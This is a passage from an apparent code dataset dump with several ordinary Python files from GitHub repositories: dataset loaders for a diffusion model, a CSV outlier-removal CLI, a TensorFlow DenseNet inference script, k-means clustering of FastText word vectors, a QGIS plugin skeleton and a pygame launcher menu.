self.coco_train2014_n_captions[index] - 1)\n c = np.load(os.path.join(self.path, 'train', f'{index}_{k}.npy'))\n else:\n assert key not in self.coco_train2014_keys_indexes\n assert 'val' in fname\n index = self.coco_val2014_keys_indexes[key]\n z = np.load(os.path.join(self.path, 'val', f'{index}.npy'))\n k = random.randint(0, self.coco_val2014_n_captions[index] - 1)\n c = np.load(os.path.join(self.path, 'val', f'{index}_{k}.npy'))\n if self.ret_key:\n return z, c, key\n else:\n return z, c\n\n\nclass MSCOCO256Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder & the contexts calculated by clip\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = MSCOCOFeatureDataset(os.path.join(path, 'train'))\n self.test = MSCOCOFeatureDataset(os.path.join(path, 'val'))\n assert len(self.train) == 82783\n assert len(self.test) == 40504\n print('Prepare dataset ok')\n\n self.empty_context = np.load(os.path.join(path, 'empty_context.npy'))\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.empty_context)\n\n # text embedding extracted by clip\n # for visulization in t2i\n self.prompts, self.contexts = [], []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis')), key=lambda x: int(x.split('.')[0])):\n prompt, context = np.load(os.path.join(path, 'run_vis', f), allow_pickle=True)\n self.prompts.append(prompt)\n self.contexts.append(context)\n self.contexts = np.array(self.contexts)\n\n # image embedding extracted by stable diffusion image encoder\n # for visulization in i2t\n 
self.img_contexts = []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis_i2t')), key=lambda x: int(x.split('.')[0])):\n if f.endswith('.npy'):\n img_context = np.load(os.path.join(path, 'run_vis_i2t', f))\n self.img_contexts.append(img_context)\n self.img_contexts = np.array(self.img_contexts)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_mscoco256_val.npz'\n\n\nclass MSCOCO256FeaturesKarpathy(DatasetFactory): # only for i2t\n def __init__(self, path):\n super().__init__()\n print('Prepare dataset...')\n self.train = MSCOCOFeatureDatasetKarpathySplit(path, 'train')\n self.test = MSCOCOFeatureDatasetKarpathySplit(path, 'val', ret_key=True) # for validation\n assert len(self.train) == 113287\n print('Prepare dataset ok')\n\n self.val_gts = get_karpathy_val_split_gts(path)\n\n # image embedding extracted by stable diffusion image encoder\n # for visulization in i2t\n self.img_contexts = []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis_i2t')), key=lambda x: int(x.split('.')[0])):\n if f.endswith('.npy'):\n img_context = np.load(os.path.join(path, 'run_vis_i2t', f))\n self.img_contexts.append(img_context)\n self.img_contexts = np.array(self.img_contexts)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n\ndef get_dataset(name, **kwargs):\n if name == 'cifar10':\n return CIFAR10(**kwargs)\n elif name == 'imagenet':\n return ImageNet(**kwargs)\n elif name == 'imagenet256_features':\n return ImageNet256Features(**kwargs)\n elif name == 'imagenet512_features':\n return ImageNet512Features(**kwargs)\n elif name == 'celeba':\n return CelebA(**kwargs)\n elif name == 'lsun_bedroom':\n return LSUNBedroom(**kwargs)\n elif name == 'lsun_bedroom64':\n return LSUNBedroom64(**kwargs)\n elif name == 'mscoco256_features':\n return MSCOCO256Features(**kwargs)\n elif name == 'mscoco256_features_karpathy':\n return MSCOCO256FeaturesKarpathy(**kwargs)\n elif name == 'bit_mscoco_text':\n return BitMSCOCOText(**kwargs)\n else:\n raise NotImplementedError(name)\n","repo_name":"ML-GSAI/DPT","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":30295,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"16"}
+{"seq_id":"11364338185","text":"import click\nfrom pathlib import Path\nfrom .algorithm import (\n OutlierDetectionModel,\n TrailingZScoreConfig,\n DEFAULT_LOOKBACK_WINDOW,\n)\nfrom .utils import (\n cli_error,\n cli_print_outlier_output,\n cli_read_csv,\n cli_saved_removed_outliers,\n)\n\n\n@click.command()\n@click.argument(\"src-path\", type=Path)\n@click.argument(\"field\", type=str)\n@click.option(\n \"--dest-path\",\n default=None,\n help=(\n \"Optionally add name of output file. \"\n \"Filename is suffixed with '-altered' if this is not provided\"\n ),\n)\n@click.option(\n \"--inc-current\",\n default=False,\n type=bool,\n help=(\n \"Include the current observation in the z-score calc. This determines \"\n \"the scoring strategy described in the readme\"\n ),\n)\n@click.option(\n \"--lookback\",\n default=DEFAULT_LOOKBACK_WINDOW,\n help=\"Look back window used to calculate z scores\",\n type=int,\n)\ndef main(src_path: Path, field: str, dest_path: Path, inc_current: bool, lookback: int):\n \"\"\"\n \\b\n\n Remove outliers from a CSV.\n\n Required Arguments:\n\n - SRC-PATH: Path: Path to the csv to remove outliers from\n\n - FIELD: str: Column name of discrete variable evaluate\n \"\"\"\n\n config = TrailingZScoreConfig(\n lookback_window=lookback, z_score_incl_current=inc_current\n )\n src_path = src_path.resolve()\n if not src_path.is_file():\n cli_error(f\"File '{str(src_path)}' does not exist\")\n\n data = cli_read_csv(src_path)\n model = OutlierDetectionModel(config)\n\n try:\n if field not in data.columns:\n raise KeyError(f\"KeyError: column '{field}' not a valid column name\")\n outliers = model.fit_predict(data[field])\n except Exception as e:\n cli_error(str(e))\n\n cli_print_outlier_output(data, outliers)\n\n cli_saved_removed_outliers(src_path, data, outliers, dest_path)\n\n\n@click.group()\ndef cli():\n pass\n\n\ncli.add_command(main)\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"nicelgueta/outlier-detection","sub_path":"outliers/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"43825133185","text":"import tensorflow as tf\nimport cv2\nimport time\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom utils import *\n\ndense_block1_num = 2\ndense_block2_num = 2\ndense_block3_num = 3\ndense_block4_num = 3\ngrowth_rate = 16\ntest_number = 0\n\n\ndef dense_net(image, img_name_index, is_training=True):\n with tf.variable_scope('conv1') as scope:\n l = conv2d(image, 3, 24, 3, 1)\n\n with tf.variable_scope('conv2_3') as scope:\n l_big = bn_relu_conv(l, is_training, 24, 32, 3, 1, name='bn_relu_conv1')\n # l = bn_relu_conv(l, is_training, 32, 32, 3, 1, name='bn_relu_conv2')\n\n # 跳链接层数可以多,其他地方尽量少\n l_first_down = tf.nn.max_pool(l_big, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n with tf.variable_scope('block1') as scope:\n # l = conv2d(l_first_down,32,growth_rate,3,1)#delete\n l = l_first_down\n for i in range(dense_block1_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n # l = bn_relu_conv(l, is_training, growth_rate*(dense_block1_num+1), 32, 3, 1)\n block1, l = add_transition_average('transition1', l, is_training,\n input_filters=growth_rate * dense_block1_num + 32, output_filters=32)\n\n with tf.variable_scope('block2') as scope:\n # l = conv2d(l,32,growth_rate,3,1)#delete\n for i in range(dense_block2_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n # l = bn_relu_conv(l,is_training,growth_rate*(1+dense_block2_num),32,3,1)\n block2, l = add_transition_average('transition2', l, is_training,\n input_filters=growth_rate * dense_block2_num + 32, output_filters=32)\n\n with tf.variable_scope('block3') as scope:\n # l = conv2d(l, 32, growth_rate, 3, 1)\n for i in range(dense_block3_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n block3, l = add_transition_average('transition3', l, is_training,\n input_filters=growth_rate * dense_block3_num + 32, output_filters=32)\n\n with tf.variable_scope('block4') as scope:\n # l = conv2d(l, 32, growth_rate, 3, 1)\n for i in range(dense_block4_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n\n with tf.variable_scope('block3_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block4_num + 32, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block3], 3)\n # l=bn_relu_conv(l,is_training,64,growth_rate,3,1,name='bn_relu_conv2')\n for i in range(dense_block3_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n with tf.variable_scope('block2_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block3_num + 64, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block2], 3)\n # l = bn_relu_conv(l, is_training, 64, growth_rate, 3, 1,name='bn_relu_conv2')\n for i in range(dense_block2_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n with tf.variable_scope('block1_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block2_num + 64, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block1], 3)\n # l = bn_relu_conv(l, is_training, 64, growth_rate, 3, 1,name='bn_relu_conv2')\n for i in range(dense_block1_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n l = bn_relu_conv(l, 
is_training, growth_rate * dense_block1_num + 64, 32, 3, 1, name='bn_relu_conv1')\n with tf.variable_scope('upsample1') as scope:\n l = upsample(l, 32, 32, 3, 2)\n # concat\n l = tf.concat([l, l_big], 3)\n l = bn_relu_conv(l, is_training, 64, 64, 3, 1)\n l = tf.nn.dropout(l, 0.5)\n # spatial dropout,dropout rate 0.5\n l = bn_relu_conv(l, is_training, 64, 32, 1, 1, name='bn_relu_conv2')\n\n with tf.variable_scope('bn_sigmoid_conv') as scope:\n l = bn_relu_conv(l, is_training, 32, 1, 1, 1)\n\n image_conv = tf.nn.sigmoid(l)\n\n saver = tf.train.Saver()\n if ckpt and ckpt.model_checkpoint_path:\n if img_name_index == 0:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print('model restored')\n return image_conv\n\n\ndef inference(image, img_name_index, is_training=True, scope_name='inference_net', scope_reuse=True):\n with tf.variable_scope(scope_name, reuse=scope_reuse) as scope:\n if scope_reuse:\n scope.reuse_variables()\n annotation_pred = dense_net(image, img_name_index, is_training)\n return annotation_pred\n\n\nsess = tf.InteractiveSession()\n# height = 960#训练图片的高\n# width = 960#训练图片的宽\nbatch_size = 40\nwrite_number = 0\nis_training = True\nprevious_time = time.clock()\ntotal_loss_list = []\nckpt = tf.train.get_checkpoint_state('E:/Tianchi/Densenet/my_network/model/')\n\npath = 'E:/Tianchi/NEW_DATA2/224_rgb/2015_224_rgb/'\nwrite_path = 'E:/Tianchi/Densenet/my_network/result_newmodel45000_2015_224/'\nimage_number = len(os.listdir(path))\nwrite_number = write_number + 1\noutput_store = np.zeros([batch_size, 224, 224, 3])\nfor img_name_index in range(0, image_number, batch_size):\n if img_name_index + batch_size > image_number:\n batch_size = image_number - img_name_index\n img_batch_store = np.zeros([batch_size, 224, 224, 3])\n for i in range(batch_size):\n img_path_input = path + os.listdir(path)[img_name_index + i]\n img_test = cv2.imread(img_path_input)\n # height,width,channel = img_test.shape\n img_test = cv2.resize(img_test, (224, 224), interpolation=cv2.INTER_CUBIC)\n img_batch_store[i, :, :, :] = img_test\n\n img_test_tensor = tf.convert_to_tensor(img_batch_store, dtype=tf.uint8)\n img_input = tf.reshape(img_test_tensor, [batch_size, 224, 224, 3])\n img_input = tf.cast(img_input, tf.float32)\n img_input = img_input * (1. / 255)\n if img_name_index == 0:\n output = inference(img_input, img_name_index, is_training=False, scope_reuse=False)\n else:\n output = inference(img_input, img_name_index, is_training=False, scope_reuse=True)\n # output = inference(img_input, is_training=True,scope_reuse=True)\n # output =model_enhance_subpixel_BN.transform_net(img_input,size, upscale,scope_reuse=True,is_training=False)\n output = output * 255\n output = tf.reshape(output, [batch_size, 224, 224, 1])\n output = output.eval()\n output[output > 100] = 255\n output[output <= 100] = 0\n\n for j in range(batch_size):\n savepath = write_path + os.listdir(path)[img_name_index + j]\n # output1 = cv2.resize(output[j,:,:,:], (224,224), interpolation=cv2.INTER_CUBIC)\n cv2.imwrite(savepath, output[j, :, :, :])\n","repo_name":"qwerty200696/Tianchi_Competition_2017","sub_path":"code/20171105/Densenet/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"22803296874","text":"from sklearn.cluster import KMeans\nfrom numbers import Number\nfrom pandas import DataFrame\nimport sys, codecs, numpy\nimport pickle\nfrom tqdm import tqdm\nfrom gensim.models import FastText\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\n\nclass autovivify_list(dict):\n '''A pickleable version of collections.defaultdict'''\n def __missing__(self, key):\n '''Given a missing key, set initial value to an empty list'''\n value = self[key] = []\n return value\n\n def __add__(self, x):\n '''Override addition for numeric types when self is empty'''\n if not self and isinstance(x, Number):\n return x\n raise ValueError\n\n def __sub__(self, x):\n '''Also provide subtraction method'''\n if not self and isinstance(x, Number):\n return -1 * x\n raise ValueError\n\ndef build_word_vector_matrix(vector_file, n_words):\n '''Return the vectors and labels for the first n_words in vector file'''\n numpy_arrays = []\n labels_array = []\n with codecs.open(vector_file, 'r', 'utf-8') as f:\n for c, r in enumerate(f):\n sr = r.split()\n labels_array.append(sr[0])\n numpy_arrays.append( numpy.array([float(i) for i in sr[1:]]) )\n\n if c == n_words:\n return numpy.array( numpy_arrays ), labels_array\n\n return numpy.array( numpy_arrays ), labels_array\n\ndef find_word_clusters(labels_array, cluster_labels):\n '''Return the set of words in each cluster'''\n cluster_to_words = autovivify_list()\n for c, i in enumerate(cluster_labels):\n cluster_to_words[ i ].append( labels_array[c] )\n return cluster_to_words\n\nword_list = []\nsentences = []\n\nstop_words = set(stopwords.words('english'))\n\n# filename = sys.argv[1]\n\n# python kmeans.py glove.6B.100d.txt 300 .1\nif __name__ == \"__main__\":\n # with open(\"../sentences.pkl\", \"rb\") as f:\n # sentences = pickle.load(f)\n\n # with open(\"../word_list.pkl\", \"rb\") as f:\n # word_list = pickle.load(f)\n\n with open(\"../data/X.txt\", 'r') as f:\n cnt = 0\n for line in f:\n cnt = cnt + 1\n if cnt%500 == 0:\n print(\"processed: \"+str(cnt)+\" lines!\")\n word_list.extend(nltk.word_tokenize(line))\n word_list = list(set(word_list))\n sublines = line.strip().split('.')\n sublines = [subline.strip().split(' ') for subline in sublines]\n sentences.extend(sublines)\n word_list = [word for word in word_list if word.isalpha()]\n print (\"Punctuations removed...\")\n word_list = [word for word in word_list if not word in stop_words]\n print (\"Stop words removed...\")\n word_list = list(set(word_list))\n print(\"word_list created successfully!\\n\"+str(len(word_list)))\n print(len(sentences))\n\n # using FastText to create embeddings from our dataset\n print(\"creating FastText model!\")\n model = FastText(sentences, size=100, window=5, min_count=5, workers=8,sg=1)\n print(\"FastText model created successfully!\")\n \n numpy_arrays = []\n labels_array = []\n print(\"creating vocabulary clusters...\")\n for word in word_list:\n labels_array.append(word)\n try:\n numpy_arrays.append(model[word])\n except:\n pass\n df = numpy.array(numpy_arrays)\n\n n_words = int(sys.argv[1]) # Number of words to analyze\n reduction_factor = float(sys.argv[2]) # Amount of dimension reduction {0,1}\n n_clusters = int( n_words * reduction_factor ) # Number of clusters to make\n kmeans_model = KMeans(init='k-means++', n_clusters=n_clusters, n_init=10)\n kmeans_model.fit(df)\n\n cluster_labels = kmeans_model.labels_\n cluster_inertia = 
kmeans_model.inertia_\n cluster_to_words = find_word_clusters(labels_array, cluster_labels)\n\n with open('cluster_to_words.ft.pkl', 'wb') as f:\n pickle.dump(cluster_to_words, f)\n \n print(\"cluster vocabulary created successfully!\")\n\n with open('cluster_to_words.ft.pkl', 'rb') as f:\n clusters = pickle.load(f)\n \n # print(clusters)\n\n# maxlen = 0\nwith open('synonym_sample.kmeans1.ft.syn', 'w+') as f:\n print(\"creating dictionary...\")\n for c in clusters:\n # print((clusters[c]))\n # print(\"\\n\")\n # maxlen = max(maxlen, len(clusters[c]))\n # if maxlen < len(clusters[c]):\n # maxlen = len(clusters[c])\n # maxc = clusters[c]\n \n words = clusters[c]\n root, words = words[0], words[1:]\n \n f.write(root+' '+root+'\\n')\n for i in range(len(words)):\n f.write(words[i]+' '+root+'\\n')\n f.write('indices'+' '+'index*')\n print(\"dictionary created successfully...\")\n\n # print(maxlen)\n # print(maxc)","repo_name":"urmisaha/Semantic_Text_Indexing_With_PostgreSQL","sub_path":"k-means-clustering/kmeans_create_vocab.py","file_name":"kmeans_create_vocab.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"71788540167","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom .resources import *\n\n#メニュー読み込み\nfrom .Sample_Menu_01 import SampleMenu01\nfrom .Sample_Menu_02 import SampleMenu02\n\nimport os\nimport os.path\nimport sys\nimport codecs\n\nQString = str\n\ntry:\n _fromUtf8 = QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\nclass Sample:\n def __init__(self, iface):\n self.iface = iface\n self.canvas = self.iface.mapCanvas()\n\n self.plugin_dir = os.path.dirname(__file__)\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'Sample_{}.qm'.format(locale))\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n if qVersion() > '4.3.3':\n QCoreApplication.installTranslator(self.translator)\n self.actions = []\n self.menu = u'Sample'\n self.toolbar = self.iface.addToolBar(u'Sample')\n self.toolbar.setObjectName(u'Sample')\n\n def tr(self, message):\n return QCoreApplication.translate('Sample', message)\n\n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n if status_tip is not None:\n action.setStatusTip(status_tip)\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n if add_to_toolbar:\n self.toolbar.addAction(action)\n if add_to_menu:\n self.iface.addPluginToMenu(\n self.menu,\n action)\n self.actions.append(action)\n return action\n\n def initGui(self):\n self.win = self.iface.mainWindow()\n icon_path = ':/plugins/Sample/icon.png'\n #メニュー設定\n self.add_action(\n icon_path=None,\n text=u\"Menu01\",\n callback=self.Menu01,\n parent=self.win)\n self.add_action(\n icon_path=None,\n text=u\"Menu02\",\n callback=self.Menu02,\n parent=self.win)\n\n def unload(self):\n for action in self.actions:\n self.iface.removePluginMenu(\n u'Sample',\n action)\n self.iface.removeToolBarIcon(action)\n del self.toolbar\n\n #Menu01メニュークリック\n def Menu01(self):\n #SampleMenu01読み込み\n self.sample_menu_01 = SampleMenu01(self.iface)\n #Menu01クリックでメッセージ表示\n self.sample_menu_01.message_add()\n\n #Menu02メニュークリック\n def Menu02(self):\n #SampleMenu02読み込み\n self.sample_menu_02 = SampleMenu02(self.iface)\n #SampleMenu02Dialog表示\n self.sample_menu_02.dlg.show()\n\n def run(self):\n pass\n","repo_name":"dayjournal/PythonMapAppPlugin","sub_path":"Chapter_04/qgis3plugin-starter/dist/Sample/Sample.py","file_name":"Sample.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"47331943420","text":"# coding=utf-8\n\n# python2 issues, div with float, not int\nfrom __future__ import division\nimport pygame\nimport os\n\ntry:\n from datetime import datetime, timedelta\nexcept:\n import datetime\n\nfrom core.constants import *\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\nhandler = logging.FileHandler(os.path.join(PATH, \"log.txt\"))\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nfrom core.colors import *\nfrom core.component.upbar import UpBar\n\nfrom core.component.squaredmenu import SquaredMenu\nfrom core.component.dialog import Dialog\nfrom core.component.simplenotification import SimpleNotification\nfrom core.component.mainpygame import MainPyGame\nfrom core.section.gogpygame import GOGPygame\nfrom core.section.itchpygame import ItchPygame\nfrom core.section.repositorypygame import RepositoryPygame\nfrom core.section.settingspygame import SettingsPygame\nfrom core.section.quitpygame import QuitPygame\nfrom core.section.wificonfigurationpygame import WifiConfigurationPygame\nfrom core.effect.pixelate import pixelate\n\nclass MenuPygame(MainPyGame, SquaredMenu, GOGPygame, ItchPygame, RepositoryPygame, SettingsPygame, WifiConfigurationPygame, QuitPygame):\n\n def __init__(self):\n # init\n # pygame.init()\n pygame.display.init()\n pygame.font.init()\n\n self.initJoysticks()\n self.loadSettings()\n self.playMusicFromSettings()\n # Create pygame screen and objects\n #self.surface = pygame.display.set_mode(WINDOW_SIZE, pygame.FULLSCREEN)\n self.surface = pygame.display.set_mode(WINDOW_SIZE)\n self.clock = pygame.time.Clock()\n pygame.display.set_caption('Menu principal')\n self.gog = None #TODO check if it could be serialized, stored, restored and synchronized with background process\n self.itch = None\n\n def main(self):\n self.notification = SimpleNotification(surface=self.surface,clock=self.clock,parent=self)\n #show notification for dev revision\n self.notification.showNotification(text='dev revision')\n options = [\n {\n \"title\" : \"Aceptar\"\n }\n ]\n #show alert for configuration\n self.dialog = Dialog(surface=self.surface,title=\"Welcome\",message=\"Please configure before use\",options=options)\n self.dialog.draw()\n\n self.drawMainMenu()\n\n def drawMainMenu(self):\n menus = [\n {\"title\": \"Itch.io (alpha)\", \"image\": \"images/itch.png\", \"action\": self.navigateItch},\n {\"title\": \"GOG (alpha)\", \"image\": \"images/GOG.png\", \"action\": self.navigateGOG},\n {\"title\": \"Wifi Configuration\", \"image\": \"images/wifi.png\", \"action\": self.configWifi},\n {\"title\": \"Remote repository\", \"image\": \"images/cloud.png\", \"action\": self.navigateRepository},\n {\"title\": \"Local\", \"image\": \"images/hdd.png\", \"action\": self.createLocalRepo},\n {\"title\": \"Settings\", \"image\": \"images/settings.png\", \"action\": self.settingsMenu},\n {\"title\": \"Exit\", \"image\": \"images/exit.png\", \"action\": self.quit}\n ]\n self.manageMainEvents(menus)\n\n #used to refresh main menu\n def drawMainMenuComponents(self,menus,selected,visibleOptions):\n # draw components\n #self.drawComponents() # at this moment bars\n self.upbar.drawBackground()\n self.upbar.refresh()\n #self.upbar.menu.draw()\n #self.upbar.drawWidgets()\n\n # clean events, needs to be after drawComponents\n self.changes = False\n\n # now draw menus\n rectangles = self.drawSquaredMenus(menus, selected, 
visibleOptions)\n\n return rectangles\n\n #used to get widgets updated\n def lastTimeWorker(self):\n if self.lastTime + timedelta(seconds=1) > datetime.now():\n #logger.debug(\"refreshing time at %s \" % datetime.now())\n self.lastTime = datetime.now()\n self.upbar.drawWidgets()\n self.changes = False\n\n def manageMainEvents(self, menus, visibleOptions=4): # TODO\n exit = False\n selected = 0\n self.changes = True\n #build component\n self.upbar = UpBar(surface=self.surface)\n\n # colored background\n self.main_background()\n\n refreshed = False\n\n self.lastTime = datetime.now()\n\n hiddenNotification = None\n pixelateTime = None\n while not exit:\n\n if not pixelateTime:\n pixelate(self.surface,False)\n pixelateTime = True\n\n self.clock.tick(FPS)\n\n if self.changes:\n # clean and put background\n self.main_background()\n\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n\n # clear events\n pygame.event.clear()\n\n if hiddenNotification is not None:\n self.changes = True\n if hiddenNotification + timedelta(seconds=1) > datetime.now():\n #self.notification = None\n pass\n\n if (self.notification is not None and self.notification.active): #TODO\n if (self.notification is not None and self.notification.active):\n hiddenNotification = datetime.now()\n #logger.debug(\"updating when notification is shown... %s\" % hiddenNotification)\n elif hiddenNotification is not None and hiddenNotification+timedelta(seconds=1) > datetime.now():\n if not refreshed:\n self.main_background()\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n refreshed = True\n logger.debug(\"launched one refresh of the components before wait 1 second of last notification was hidden\")\n elif hiddenNotification is not None:\n logger.debug(\"launched final refresh of the components after 1 second of last notification was hidden\")\n hiddenNotification = None\n if self.notification:\n self.main_background()\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n\n self.lastTimeWorker()\n\n # DEBUG: get events and configure\n events = pygame.event.get()\n if len(events) != 0:\n logger.debug(\"mainEvent event %s\" % str(events))\n\n #now manage dialog\n options = None\n if self.dialog is not None and self.dialog.active:\n options = self.dialog.draw(focus=selected)\n else:\n self.dialog = None\n for event in events:\n # normal events\n if event.type == pygame.QUIT:\n exit = True\n elif event.type == pygame.KEYDOWN:\n self.changes = True\n if event.key == pygame.K_ESCAPE:\n pixelate(self.surface,True)\n if self.dialog is not None and self.dialog.active:\n self.dialog.active = False\n selected = 0\n else:\n exit = True\n elif event.key == pygame.K_UP:\n if selected > 0:\n selected -= 1\n elif event.key == pygame.K_DOWN:\n if self.dialog is not None and self.dialog.active:\n # normal part\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.key == pygame.K_LEFT:\n # normal part\n if selected > 0:\n selected -= 1\n elif event.key == pygame.K_RIGHT:\n if self.dialog is not None and self.dialog.active:\n # normal part\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.key == pygame.K_b:\n if self.dialog is not None and self.dialog.active:\n self.dialog.active = False\n selected = 0\n else:\n #normal part\n exit = True\n elif event.key == pygame.K_a or event.key == pygame.K_RETURN:\n if self.dialog 
is not None and self.dialog.active:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n self.dialog.active = False\n else:\n #normal part\n pixelate(self.surface,True)\n menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n elif event.key == pygame.K_f:\n if self.surface.get_flags() & pygame.FULLSCREEN:\n pygame.display.set_mode(WINDOW_SIZE)\n else:\n pygame.display.set_mode(WINDOW_SIZE, pygame.FULLSCREEN)\n elif event.type == pygame.JOYAXISMOTION:\n self.changes = True\n if event.axis == 1: # up and down\n if event.value > 0:\n if selected < len(menus) - 1:\n selected += 1\n elif event.value < 0:\n if selected > 0:\n selected -= 1\n elif event.axis == 0: # left and right\n if event.value > 0:\n if self.dialog is not None and self.dialog.active:\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.value < 0:\n if selected > 0:\n selected -= 1\n\n elif event.type == pygame.JOYBUTTONDOWN:\n if self.dialog is not None and self.dialog.active:\n if event.button == 1:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n elif event.button == 2:\n selected = 0\n self.dialog.active = False\n else:\n # normal part\n self.changes = True\n if event.button == 1: # button A - enter\n menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n elif event.button == 2: # button B - back\n exit = True\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if self.dialog is not None and self.dialog.active:\n for i in range(0,len(options)):\n option = options[i]\n if option[\"rectangle\"].collidepoint(event.pos):\n selected = i\n else:\n #normal part\n i = 0\n self.changes = True\n for rectangle in rectangles:\n if rectangle.collidepoint(event.pos):\n if visibleOptions > len(menus):\n visibleOptions = len(menus)\n start = 0\n if selected > int(visibleOptions / 2):\n start = int(visibleOptions / 2)\n if start + visibleOptions > len(menus):\n start = len(menus) - visibleOptions\n end = start + visibleOptions\n logger.debug(\"start %s end %s\" % (start, end))\n logger.debug(\"I deduced position %s\" % (start + i))\n selected = (start + i)\n i += 1\n elif event.type == pygame.MOUSEBUTTONUP:\n if self.dialog is not None and self.dialog.active:\n newSelected = -1\n for i in range(0, len(options)):\n option = options[i]\n if option[\"rectangle\"].collidepoint(event.pos):\n newSelected = i\n if newSelected == selected:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n self.dialog.active = False\n self.changes = True\n else:\n # normal part\n i = 0\n for rectangle in rectangles:\n if rectangle.collidepoint(event.pos):\n if visibleOptions > len(menus):\n visibleOptions = len(menus)\n start = 0\n if selected > int(visibleOptions / 2):\n start = int(visibleOptions / 2)\n if start + visibleOptions > len(menus):\n start = len(menus) - visibleOptions\n end = start + visibleOptions\n logger.debug(\"start %s end %s\" % (start, end))\n logger.debug(\"I will launch and select position %s\" % (start + i))\n launch = selected == (start + i)\n selected = (start + i)\n if launch:\n menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n i += 1\n\n pygame.display.flip()\n\n def drawComponents(self):\n self.upbar.draw()\n\n def main_background(self):\n\n if self.on and self.file is not None: # play background music\n self.surface.blit(self.pic, (0, 0))\n else:\n 
self.surface.fill(COLOR_BACKGROUND)\n","repo_name":"lemoncrest/x-pi-one-launcher","sub_path":"core/section/menupygame.py","file_name":"menupygame.py","file_ext":"py","file_size_in_byte":15414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
